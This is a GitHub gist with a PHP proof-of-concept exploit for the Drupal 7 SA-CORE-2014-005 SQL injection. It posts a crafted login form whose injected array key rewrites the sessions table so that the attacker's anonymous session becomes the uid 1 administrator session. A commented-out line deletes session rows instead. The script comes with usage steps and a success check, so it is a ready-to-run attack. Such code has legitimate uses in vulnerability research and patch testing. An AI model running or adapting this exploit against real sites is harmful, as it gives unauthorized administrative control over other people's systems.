Skip to content

Instantly share code, notes, and snippets.

@DavidHernandez
Created October 16, 2014 17:19
Show Gist options
  • Save DavidHernandez/2f0b80a437848b29c411 to your computer and use it in GitHub Desktop.
Save DavidHernandez/2f0b80a437848b29c411 to your computer and use it in GitHub Desktop.
This is another PoC for the SA-CORE-2014-005 vulnerability. Instead of updating the users table, activates an anonymous session to change your session into admin.
<?php
/**
* D7 autologin.
* Exploits SA-CORE-2014-005 to change your anonymous session into an uid 1 session.
* In order to work, first you need to have an anonymous session in the sessions table.
* One way to achieve this is to go to the update.php page.
*
* Usage: php d7-autologin.php http://example.com 127.0.0.1
*
* Change the IP with your IP address.
* After that, you should have access to the site by refreshing the page.
*
* This script is based on the one found here:
* http://drupal.stackexchange.com/questions/133795/what-kind-of-attacks-does-the-patch-for-sa-core-2014-005-drupal-7-32-prevent
*/
$url = $argv[1];
$hostname = $argv[2];
echo "Usage: php script.php http://example.com [Your IP address]
This script works updating the sessions table. For that, you need to create a session in the DB as an anonymous. An easy way is to get an access denied on the update.php page. Just go to:
";
echo $url . "/update.php
";
$post_data = "name[0%20;update+sessions+set+uid%3D1+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
//$post_data = "name[0%20;delete+from+sessions+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Just refresh the update.php page you loaded before.
";
}
else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working.
";
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment